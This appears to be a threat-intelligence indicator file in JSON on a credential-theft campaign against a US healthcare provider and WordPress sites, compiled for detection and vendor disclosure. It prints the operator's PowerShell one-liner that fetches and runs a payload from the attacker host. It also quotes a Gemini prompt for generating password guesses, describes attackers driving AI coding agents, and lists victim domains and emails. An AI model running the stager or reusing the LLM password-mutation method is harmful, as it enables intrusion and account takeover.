{ "metadata": { "campaign_slug": "russian-gemini-credential-mill-213.165.51.115", "campaign_title": "Russian Gemini CLI Credential Mill (UTA-2026-012) — 213.165.51.115 / US healthcare provider", "uta_designation": "UTA-2026-012", "parent_series": "ai-agent-frameworks-2026-05-23", "case_index": "Case 1 of 8 in parent series", "report_date": "2026-05-25", "first_seen": "2026-03-30", "last_active_evidence": "2026-05-23", "analyst": "The Hunters Ledger", "confidence": "HIGH", "tlp": "CLEAR", "primary_family": "Custom-Python-A2A-C2 + Gemini-CLI-Augmented-Credential-Mill", "threat_level": "CRITICAL", "license": "CC BY-NC 4.0", "reference": "https://the-hunters-ledger.com/reports/russian-gemini-credential-mill-213.165.51.115/" }, "file_indicators": { "ntlm_hashes": [ { "value": "31d6cfe0d16ae931b73c59d7e0c089c0", "type": "ntlm", "confidence": "DEFINITE", "context": "healthcare victim local SAM Administrator account — well-known EMPTY-PASSWORD NTLM hash; operator's initial-access vector", "false_positive_risk": "low" } ], "mysql_password_hashes": [], "exposed_credential_files": [ { "value": "1PasswordExport-XRAOLK4ZIZHJPDWPVEMGPRDXBE-20260320-060857.csv", "type": "filename", "confidence": "DEFINITE", "context": "Complete 1Password vault export from unidentified victim, dated 2026-03-20; vault ID XRAOLK4ZIZHJPDWPVEMGPRDXBE resolvable by 1Password/AgileBits for victim identification", "false_positive_risk": "low" }, { "value": "all_wp_30k_logins.txt", "type": "filename", "confidence": "HIGH", "context": "Operator's bulk WordPress site credential dump (~30,000 site credentials, URL/user/pass format)", "false_positive_risk": "low" }, { "value": "AI_SNIPER_GOODS.txt", "type": "filename", "confidence": "HIGH", "context": "Output file of ai_sniper_brute.py — verified-valid credentials post-AI-mutation. Operator-bespoke filename.", "false_positive_risk": "low" }, { "value": "ULTRA_GOLD_TARGETS.txt", "type": "filename", "confidence": "HIGH", "context": "Operator's curated target list input to ai_sniper_brute.py. Operator-bespoke filename.", "false_positive_risk": "low" }, { "value": "AI_ADMIN_MUTANTS.txt", "type": "filename", "confidence": "HIGH", "context": "Operator's 5.5 MB AI-generated admin-credential mutation file. Direct on-disk evidence of LLM-Personalized Credential Mutation novel TTP.", "false_positive_risk": "low" } ] }, "network_indicators": { "domains": [ { "value": "tralalarkefe.com", "type": "domain", "confidence": "DEFINITE", "context": "Operator-controlled root domain; all subdomains operator-bound", "action": "BLOCK at registrar level", "false_positive_risk": "low" }, { "value": "c2.tralalarkefe.com", "type": "domain", "confidence": "DEFINITE", "context": "Operator C2 command channel; Cloudflare Tunnel-fronted; requires Mozilla/5.0 User-Agent + X-Agent-ID header", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "payloads.tralalarkefe.com", "type": "domain", "confidence": "DEFINITE", "context": "Operator payload distribution channel; serves run_bg.ps1, agent_final.ps1, stealth.ps1 PowerShell payloads", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "windows_server.tralalarkefe.com", "type": "domain", "confidence": "DEFINITE", "context": "healthcare victim Windows Server (Win 11 Pro, internal IP [victim internal host — redacted], AD domain [victim AD domain — redacted]) Cloudflare Tunnel for operator's WinRM + NetSupport Manager access", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "gil_dr1.tralalarkefe.com", "type": "domain", "confidence": "DEFINITE", "context": "healthcare victim Doctor's PC (the Doctor's PC) Cloudflare Tunnel for operator's SSH access (plaintext password [redacted] in operator notes)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "catchall1.tralalarkefe.com", "type": "domain", "confidence": "HIGH", "context": "Operator Mailpit catch-all email interface (GCP 35.192.41.201); receives all email to *@tralalarkefe.com for burner account registration", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "10101.tralalarkefe.com", "type": "domain", "confidence": "HIGH", "context": "Tunnel alias for payload server at 127.0.0.1:10101", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "tenant-upcoming-great-descending.trycloudflare.com", "type": "domain", "confidence": "HIGH", "context": "Operator's one-time C2-bundle bootstrap tunnel (Cloudflare quick-tunnel address; ephemeral but documented in install_c2_bundle.sh)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "antipublic.one", "type": "domain", "confidence": "HIGH", "context": "Russian credential-DB service; operator's mass_wp_mutator.py integrates via API key. Outbound from server-class non-research hosts is high-confidence operator signal.", "action": "MONITOR", "false_positive_risk": "low" }, { "value": "generativelanguage.googleapis.com", "type": "domain", "confidence": "MODERATE", "context": "Gemini Generative Language API; operator's check_keys.py validates stolen keys against /v1beta/models endpoint. Egress signature requires tight scoping (server-class hosts only; key-diversity threshold) to avoid developer-environment FPs.", "action": "MONITOR", "false_positive_risk": "high" } ], "ipv4": [ { "value": "213.165.51.115", "type": "ipv4", "confidence": "DEFINITE", "context": "Primary operator host — AEZA GROUP LLC bulletproof hosting; serves :8082 open directory exposing the entire arsenal/; Hunt first-seen 2026-03-30", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "34.34.81.129", "type": "ipv4", "confidence": "DEFINITE", "context": "Operator Windows C2 fallback — GCP project, europe-west4-a Netherlands; 10 vCPU/40 GB RAM/200 GB SSD; RDP user 'admin'; provisioned 2026-03-25", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "34.34.57.141", "type": "ipv4", "confidence": "DEFINITE", "context": "Operator Ghost Proxy — GCP project, Netherlands; Dante SOCKS5 server on port 1080; all system logs/journald/VPC Flow logs disabled (operator-OPSEC pure passthrough)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "35.192.41.201", "type": "ipv4", "confidence": "DEFINITE", "context": "Operator Mailpit catch-all — GCP; receives all email to *@tralalarkefe.com; interface at catchall1.tralalarkefe.com", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "95.211.175.167", "type": "ipv4", "confidence": "HIGH", "context": "Webshare proxy IP used by ai_sniper_brute.py for WP brute-force proxy rotation (port 13400, Dutch datacenter range). Operator-shared infrastructure, not operator-owned.", "action": "MONITOR", "false_positive_risk": "medium" }, { "value": "85.17.70.56", "type": "ipv4", "confidence": "HIGH", "context": "Second Webshare proxy IP used by ai_sniper_brute.py (port 13400, Dutch datacenter range). Operator-shared infrastructure, not operator-owned.", "action": "MONITOR", "false_positive_risk": "medium" } ], "internal_victim_ipv4": [], "urls": [ { "value": "https://payloads.tralalarkefe.com/run_bg.ps1", "type": "url", "confidence": "DEFINITE", "context": "Operator's stager PowerShell — first stage of universal infection one-liner", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://c2.tralalarkefe.com/api/v1/update", "type": "url", "confidence": "DEFINITE", "context": "Operator C2 beacon check-in endpoint (GET with X-Agent-ID header)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://c2.tralalarkefe.com/api/v1/agents", "type": "url", "confidence": "DEFINITE", "context": "Operator C2 agent enumeration endpoint (defender-takeover endpoint — unauthenticated GET returns full beacon list to any caller)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://c2.tralalarkefe.com/api/v1/interact", "type": "url", "confidence": "DEFINITE", "context": "Operator C2 command-submission endpoint (POST with agent_id + base64(UTF-16LE) task)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://c2.tralalarkefe.com/api/v1/telemetry", "type": "url", "confidence": "DEFINITE", "context": "Operator C2 beacon result-return endpoint (POST with base64(UTF-16LE) results)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://c2.tralalarkefe.com/api/v1/get_results", "type": "url", "confidence": "HIGH", "context": "Client-called endpoint NOT implemented server-side at capture (iterative-dev evidence; missing endpoint indicates operator's C2 codebase is in-progress)", "action": "BLOCK", "false_positive_risk": "low" }, { "value": "https://antipublic.one/api/v2/search", "type": "url", "confidence": "HIGH", "context": "Operator's mass_wp_mutator.py AntiPublic credential-DB lookup endpoint", "action": "MONITOR", "false_positive_risk": "low" } ], "user_agents": [ { "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "type": "user_agent", "confidence": "MODERATE", "context": "Mandatory User-Agent for C2 beacon (per operator's notes, Cloudflare blocks with 403/501 otherwise). CLASS-LEVEL signature — DO NOT use alone; combine with X-Agent-ID header and tralalarkefe.com destination.", "action": "MONITOR (combined with other indicators)", "false_positive_risk": "high" } ], "http_headers": [ { "value": "X-Agent-ID", "type": "http_header_name", "confidence": "DEFINITE", "context": "Operator-bespoke HTTP header for beacon identification. Format: HOSTNAME_user (e.g., _staff). Combined with tralalarkefe.com destination = high-fidelity operator signal.", "action": "MONITOR", "false_positive_risk": "low" } ] }, "host_indicators": { "registry_keys": [ { "value": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateManager", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateManager", "value_data": "C:\\Users\\\\AppData\\Local\\Microsoft\\WindowsUpdateManager.ps1", "value_type": "REG_SZ", "type": "registry_key", "confidence": "HIGH", "context": "Operator-documented victim-side persistence path per C2_INFRA_TRANSFER.md. The value name 'WindowsUpdateManager' under HKCU\\Run is operator-bespoke (legitimate Windows Update does not run under HKCU\\Run).", "false_positive_risk": "low" } ], "file_paths": [ { "value": "%LOCALAPPDATA%\\Microsoft\\WindowsUpdateManager.ps1", "type": "file_path", "confidence": "HIGH", "context": "Operator-documented persistent beacon file path", "false_positive_risk": "low" }, { "value": "/root/arsenal/", "type": "file_path_operator_side", "confidence": "DEFINITE", "context": "Operator's primary tooling directory on 213.165.51.115; 4,245 files / 1.43 GB. Contains C2 source, AI tools, credential ledger, victim machine inventory, handoff docs, bulk credential dumps.", "false_positive_risk": "low" }, { "value": "/root/payloads/", "type": "file_path_operator_side", "confidence": "DEFINITE", "context": "Operator's victim-side PowerShell payload directory on 213.165.51.115. Served by c2_server.py's GET / file-server endpoint (path-traversal vulnerable).", "false_positive_risk": "low" }, { "value": "~/.gemini/", "type": "directory_pattern", "confidence": "MODERATE", "context": "Gemini CLI configuration directory — presence on a server-class host combined with offensive tooling is a high-confidence operator signal. Use as filesystem hunt input.", "false_positive_risk": "medium" } ], "ad_domain_names": [], "wmi_artifacts": [ { "value": "\\\\.\\root\\subscription EventConsumer + EventFilter + FilterToConsumerBinding triplet matching stealth.ps1 fileless persistence pattern", "type": "wmi_persistence", "confidence": "MODERATE", "context": "Operator's stealth.ps1 (per C2_MIGRATION_GUIDE.md) provides WMI + TaskScheduler fileless persistence via __EventConsumer + __EventFilter + __FilterToConsumerBinding triplet. Generic WMI EventConsumer detection signatures apply; specific persistence-event signature pending direct binary analysis of stealth.ps1.", "false_positive_risk": "medium" } ] }, "behavioral_indicators": { "c2_wire_signature": [ { "value": "HTTP request to *.tralalarkefe.com with User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) + X-Agent-ID: _ header + /api/v1/{update,agents,interact,telemetry,get_results} URI + base64(UTF-16LE) body", "type": "c2_wire_pattern", "confidence": "DEFINITE", "context": "Complete operator C2 wire signature; high-fidelity for SIEM/IDS rule authoring", "false_positive_risk": "low" }, { "value": "base64(UTF-16LE) command encoding (decode: base64.b64decode(x).decode('utf-16le'))", "type": "encoding_pattern", "confidence": "DEFINITE", "context": "Operator C2 command/result body encoding scheme; no keyed obfuscation. Defenders can decode commands with two stdlib calls.", "false_positive_risk": "low" }, { "value": "Beacon interval: 5 seconds (default per C2_INFRA_TRANSFER.md)", "type": "beacon_cadence", "confidence": "HIGH", "context": "Operator-documented beacon interval", "false_positive_risk": "low" } ], "powershell_stager_signature": [ { "value": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $h = @{'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'}; iex (Invoke-RestMethod -Uri 'https://payloads.tralalarkefe.com/run_bg.ps1' -Headers $h)", "type": "powershell_stager", "confidence": "DEFINITE", "context": "Operator's universal infection one-liner (per C2_INFRA_TRANSFER.md). Catches new compromises at infection time.", "false_positive_risk": "low" } ], "operator_side_process_signature": [ { "value": "cloudflared access tcp --hostname *.tralalarkefe.com --url localhost:", "type": "process_argv_pattern", "confidence": "DEFINITE", "context": "Operator's persistent victim-side tunnel process argv (Linux operator host); captured live in operator session 2026-03-19T22-26 ps output", "false_positive_risk": "low" } ], "credential_mutation_pattern": [ { "value": "Outbound HTTPS to generativelanguage.googleapis.com with prompts containing 'Act as an expert red-team password analyst' + 'Most Recent Password from dump' + 'generate exactly 20 likely current mutations'", "type": "llm_prompt_pattern", "confidence": "DEFINITE", "context": "Operator's ai_sniper_brute.py Gemini prompt template — diagnostic signature of LLM-Personalized Credential Mutation novel TTP. For Google's abuse team prompt-content monitoring.", "false_positive_risk": "low" }, { "value": "Outbound HTTPS to generativelanguage.googleapis.com/v1beta/models?key=AIzaSy* with high key-diversity from single source IP", "type": "api_key_validation_pattern", "confidence": "HIGH", "context": "Operator's check_keys.py validation pattern — high key-diversity (40+ distinct AIzaSy* parameter values) from single source IP is operator signal", "false_positive_risk": "medium" } ], "filesystem_hunt_patterns": [ { "value": "Markdown files containing '**To:** Gemini CLI' AND '**From:** Gemini CLI' headers", "type": "filesystem_pattern", "confidence": "DEFINITE", "context": "AI Operator Handoff Document signature (C2_INFRA_TRANSFER.md exemplar). Operator-bespoke AI-to-AI framing.", "false_positive_risk": "low" }, { "value": "Markdown files containing 'When starting a new session, refer to this file' directive co-located with ~/.gemini/ directory", "type": "filesystem_pattern", "confidence": "HIGH", "context": "AI Operator Handoff Document signature (DEPLOYED_TOOLS.md exemplar). Session-start load directive.", "false_positive_risk": "low" }, { "value": "Files matching AI_SNIPER_GOODS.txt, AI_ADMIN_MUTANTS.txt, ULTRA_GOLD_TARGETS.txt, *MUTANT*.txt, valid_gemini_keys.txt, gemini_3.1_keys.txt on server-class host", "type": "filesystem_pattern", "confidence": "HIGH", "context": "Operator-bespoke filenames; co-occurrence on a single host is high-fidelity operator signal", "false_positive_risk": "low" }, { "value": "Russian-language Python comments in offensive tooling: 'Не душим API Gemini', 'Медленно, в 3 потока', 'Инициализация ИИ'", "type": "filesystem_pattern", "confidence": "DEFINITE", "context": "Operator-bespoke Russian-language comments in ai_sniper_brute.py source — uniquely operator-attributable", "false_positive_risk": "low" } ] }, "operator_credentials_for_vendor_disclosure": { "note": "All credentials defanged here (first-8 + last-4 chars) per project credential-redaction hygiene rule. Full plaintext in Evidence/russian-arsenal-CREDENTIALS.md for direct vendor T&S disclosure.", "gemini_api_keys_stolen": [ { "value_defanged": "AIzaSyD2...QGvo", "type": "gemini_api_key", "confidence": "DEFINITE", "context": "Operator's first Gemini API key (same key hardcoded in ai_sniper_brute.py and check_keys.py). 40+ total keys in operator's check_keys.py inventory. All keys require Google T&S revocation.", "ts_recipient": "Google Trust & Safety", "action": "REVOKE" }, { "value_defanged": "40+ keys total (full list in stage1-malware-analyst.md Section 3.3.2)", "type": "gemini_api_key_inventory", "confidence": "DEFINITE", "context": "Operator's stolen Gemini API key rotation pool. Each key issued to an unidentified victim customer who now bears unauthorized usage charges. Google T&S can identify owning customers from key telemetry.", "ts_recipient": "Google Trust & Safety + Google Cloud Security", "action": "REVOKE + customer notification" } ], "openai_key": [ { "value_defanged": "sk-proj-X9r...", "type": "openai_api_key", "confidence": "DEFINITE", "context": "Operator-verified working with access to gpt-4.1, gpt-4o, o3-mini per operator's CREDENTIALS.md notes", "ts_recipient": "OpenAI Trust & Safety", "action": "REVOKE + customer notification" } ], "venice_ai_key": [ { "value_defanged": "VENICE_ADMIN_KEY_xkr...SfoLjTh", "type": "venice_admin_key", "confidence": "DEFINITE", "context": "Operator uses Venice AI (uncensored-LLM API platform) for content mainstream LLMs would refuse", "ts_recipient": "Venice AI", "action": "REVOKE" } ], "cloudflare_credentials": [ { "value_defanged": "pBkv...BztGF2", "type": "cloudflare_api_token", "confidence": "DEFINITE", "context": "Operator's Cloudflare 'God Mode' API token with Tunnel+Access+DNS Edit + Zone Read scopes", "ts_recipient": "Cloudflare PSIRT", "action": "REVOKE + account audit" }, { "value_defanged": "6dea2ff9...19b671", "type": "cloudflare_account_id", "confidence": "DEFINITE", "context": "Operator's Cloudflare Account ID — PSIRT can audit signup details + payment method + IP history for attribution coordination", "ts_recipient": "Cloudflare PSIRT", "action": "AUDIT" }, { "value_defanged": "6d415863...18f47af5", "type": "cloudflare_zone_id", "confidence": "DEFINITE", "context": "Operator's Cloudflare Zone ID for tralalarkefe.com — PSIRT can teardown tunnel infrastructure", "ts_recipient": "Cloudflare PSIRT", "action": "TEARDOWN" } ], "github_credentials": [ { "value_defanged": "ghp_tdcX...G4PDaRW", "type": "github_pat", "confidence": "DEFINITE", "context": "Operator's GitHub Personal Access Token for org oravepo546-stack", "ts_recipient": "GitHub Trust & Safety", "action": "REVOKE + org audit" }, { "value_defanged": "sonner1337", "type": "github_handle", "confidence": "DEFINITE", "context": "Operator's primary GitHub identity", "ts_recipient": "GitHub Trust & Safety", "action": "SUSPEND + cross-reference with oravepo546-stack" }, { "value_defanged": "oravepo546-stack", "type": "github_org", "confidence": "DEFINITE", "context": "Operator's secondary GitHub identity (org account)", "ts_recipient": "GitHub Trust & Safety", "action": "SUSPEND" }, { "value_defanged": "github.com/oravepo546-stack/Gemini-CLI-api-key-rotation", "type": "github_repo_url", "confidence": "DEFINITE", "context": "Operator's publicly-published Gemini API key rotation wrapper — open-source release of operator tooling", "ts_recipient": "GitHub Trust & Safety", "action": "REMOVE" } ], "gcp_credentials": [ { "value_defanged": "geminicli@elated-gizmo-491112-k0.iam.gserviceaccount.com", "type": "gcp_service_account", "confidence": "DEFINITE", "context": "Operator's GCP service account for project elated-gizmo-491112-k0", "ts_recipient": "Google Cloud Trust & Safety", "action": "REVOKE + audit project" }, { "value_defanged": "elated-gizmo-491112-k0", "type": "gcp_project_id", "confidence": "DEFINITE", "context": "Operator-controlled GCP project (existing)", "ts_recipient": "Google Cloud Trust & Safety", "action": "TAKEDOWN" } ], "antipublic_credentials": [ { "value_defanged": "eyJhbGciOiJ...NpjxlU (jti:44298, sub:31703, iat:1774740637)", "type": "antipublic_jwt", "confidence": "DEFINITE", "context": "Operator's AntiPublic.one paid subscription JWT API key", "ts_recipient": "AntiPublic operator", "action": "REVOKE + customer correlation" } ], "telegram_artifacts": [ { "value_defanged": "@americanpatriotus", "type": "telegram_channel", "confidence": "DEFINITE", "context": "Operator's co-located US-targeted disinformation channel ('Quantum Patriot'); posted to via Gemini CLI sessions (session 2026-03-25T18-27 captured); anti-fraud / JD Vance themed content rewritten from mainstream RSS via operator's quantum_patriot.py 24/7 automation", "ts_recipient": "Telegram Trust & Safety", "action": "TERMINATE" } ] }, "victim_inventory": { "primary_named_victim": { "name": "US healthcare provider (name redacted)", "type": "US dental practice / small healthcare", "compromise_evidence": "Full operator-side credential ledger captured: 4 local machine credentials + 4 NTLM hashes (Administrator with EMPTY-PASSWORD hash) + 3 internal second internal host NTLM hashes + 1 OpenDental MySQL root hash + persistent Cloudflare Tunnels (RDP/WinRM + SSH) configured at capture time + dedicated GCP project [victim-named GCP project — redacted] named after victim", "disclosure_priority": "Tier 0 (highest — HIPAA-regulated PHI)", "disclosure_path": "Direct practice notification + HC3 (HHS Health Sector Cybersecurity Coordination Center) coordination" }, "verified_valid_corporate_wp_victims": [ "sigsprint.com (contato@sigsprint.com — Brazilian Portuguese-speaking)", "galkinlaw.com (wgalkin@galkinlaw.com — US law firm)", "opuatechnologies.com (sreed@opuatechnologies.com — US tech SaaS)", "averywongphotography.com (info@averywongphotography.com — US photographer)", "ddmsuo.eu (josuawilmes@gmail.com — EU)", "doyoof.com", "mendozatechnologies.com", "parkesweatshirtshop.com", "allkitchensurfaces.com", "indiemotionstudio.com", "prixship.com", "rawnlaw.com", "plaoncorp.com", "roanokeweaponry.com", "katiemorton.com", "musicanet.org", "videocartonline.com", "annisatravel.com", "realwealthmanagement.com", "spliceengineering.com", "iron-bay.com", "designz.com", "goodwinboys.com", "vakhitova.com", "wholesomeharvestfarm.com", "youthhockeytraining.com", "profotofix.com", "ea-ky.com", "joelandjess.com", "goldxstar.com" ], "bulk_wp_credentials": { "count": "~30,000 WordPress site credentials in all_wp_30k_logins.txt", "disclosure_path": "WPScan / Wordfence / Automattic partnership for bulk notification (individual mass-notification infeasible)" }, "stolen_1password_vault_owner": { "vault_id": "XRAOLK4ZIZHJPDWPVEMGPRDXBE", "export_date": "2026-03-20", "compromise_evidence": "1PasswordExport-XRAOLK4ZIZHJPDWPVEMGPRDXBE-20260320-060857.csv on operator's host", "disclosure_path": "1Password / AgileBits security team — they can resolve vault ID to customer" }, "llm_api_key_victims": { "google_gemini": "40+ unidentified customers per the check_keys.py inventory; Google T&S can identify from key telemetry", "openai": "1 unidentified customer; OpenAI T&S can identify from key telemetry", "venice_ai": "1 unidentified customer; Venice AI can identify" } }, "novel_ttps_anchored_by_this_campaign": [ { "ttp": "AI Operator Handoff Documents", "description": "Operator-authored Markdown files written specifically to re-prime new AI agent sessions with full operational context. Treats the AI as a teammate who has lost memory.", "exemplars_in_this_campaign": [ "C2_MIGRATION_GUIDE.md (Russian narrative; implicit instructional tone)", "C2_INFRA_TRANSFER.md (explicit '**To:** Gemini CLI / **From:** Gemini CLI' header)", "DEPLOYED_TOOLS.md (explicit 'When starting a new session, refer to this file' directive)" ], "novelty_basis": "First public artifact-level documentation; existing AI-misuse reporting documents AI-generated content (phishing, code), this documents AI-consumed operator documentation (inverse data flow)", "mitre_attack_gap": "No clean fit; closest adjacent is T1587 (Develop Capabilities) but qualitatively distinct; propose new MITRE sub-technique post-publication", "confidence": "HIGH" }, { "ttp": "LLM-Personalized Credential Mutation", "description": "Using a frontier LLM (Gemini 2.5 Flash) at attack time to generate per-target password mutations from email + domain + last-known-password. Replaces hashcat-rules era static password mangling.", "exemplars_in_this_campaign": [ "ai_sniper_brute.py with hardcoded Gemini prompt template", "AI_ADMIN_MUTANTS.txt (5.5 MB on-disk evidence of mutation output)", "AI_SNIPER_GOODS.txt (verified-valid mutation output)" ], "novelty_basis": "First public artifact-level documentation of operationalized form; academic LLM-for-password-guessing work exists (PassGAN 2017, more recent LLM-based) but no in-the-wild documented cases in mainstream threat-intel reporting", "mitre_attack_gap": "Maps to T1110 (Brute Force) but the LLM-mutation sub-technique is new; propose T1110.005 (LLM-Generated Credential Mutation) to MITRE", "confidence": "HIGH" }, { "ttp": "Operator-Built Unauthenticated Python-stdlib C2", "description": "Operator's custom A2A C2 backend (c2_server.py) is a Python stdlib BaseHTTPServer with zero authentication on any endpoint, path-traversal vulnerable in file-server endpoint, used in active operations against named victims", "exemplars_in_this_campaign": [ "c2_server.py with 5 unauthenticated endpoints", "Missing /api/v1/get_results endpoint (client-called but not server-implemented = direct evidence of iterative development)", "Multi-instance deployment on ports 8081/8090/10101" ], "novelty_basis": "Defender-takeover surface is exceptional; custom-rolled unauthenticated C2s used in active operations against named state-owned victims and US healthcare with documented victim machine inventory is rare in published reporting", "mitre_attack_gap": "Closest fit T1071.001 (Web Protocols) but unauthenticated-by-design aspect is qualitatively distinct; propose new T1071 sub-technique annotation", "confidence": "HIGH" } ], "cross_domain_findings": { "ai_augmented_disinformation_operation": { "channel": "@americanpatriotus (Telegram)", "content_style": "'Quantum Patriot' Q-style anti-fraud / JD Vance themed; mainstream RSS feeds (Fox/CNN/NYT/Reuters/NBC) reinterpreted through 'patriot' lens", "automation_script": "quantum_patriot.py running 24/7 via nohup", "features": "Automated 07:00 EST morning greetings, EST prime-time scheduling, anti-duplication logic, Telegram-based remote control (/auto on/off commands)", "evidence": "Direct posting evidence in session 2026-03-25T18-27-1d86853d.json (Gemini CLI session capturing the operator preparing and posting content)", "implication": "Same operator runs credential mill + US-targeted Telegram disinformation operation. Cross-domain operator with mixed financial + ideological motivations. Worth Stanford Internet Observatory / DFRLab cross-domain election-disinfo visibility." } } }